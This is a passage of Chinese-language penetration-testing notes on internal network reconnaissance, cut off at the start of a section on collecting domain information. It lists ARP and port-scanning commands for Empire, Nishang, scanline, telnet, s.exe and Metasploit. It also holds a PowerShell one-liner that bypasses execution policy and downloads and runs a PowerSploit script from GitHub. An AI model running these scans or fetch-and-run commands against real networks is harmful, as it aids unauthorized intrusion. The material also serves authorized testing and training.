Empire
中的
arpscan
模块:
usemodule situational_awareness/network/arpscan
Nishang
中的
Invoke-ARPScan.ps1
脚本
powershell.exe -exec bypass -Command"& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}" >> c:\log.txt
通过常规
TCP/UDP
端⼝扫描
scanline
⼯具
scanline -h -t 20,80-89,110,389,445,3389,1099,7001,3306,1433,8080,1521 -u 53,161 -O c:\log.txt -p 192.168.1.1-254 /b
扫描域内端⼝
利⽤
telnet
命令扫描
telnet DC 1433
s
扫描器
s.exe tcp 192.168.1.1 192.168.1.254 445,1433,3389,7001 256 /Banner /save
Metasploit
端⼝扫描
use auxiliary/scanner/portscan/tcp
PowerSploit
的
Invoke-portscan.ps1
脚本
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('
https://raw.githubusercontent.com/PowerShellMa
fia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan
-Host 192.168.1.1/24 -T4 -ports '445,3389,1433,8080,7001' -oA
c:\log.txt"
Nishang
的
Invoke-PortScan
模块
Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ScanPort [
探测存活
-ResolveHost]
收集域内基础信息
查询域: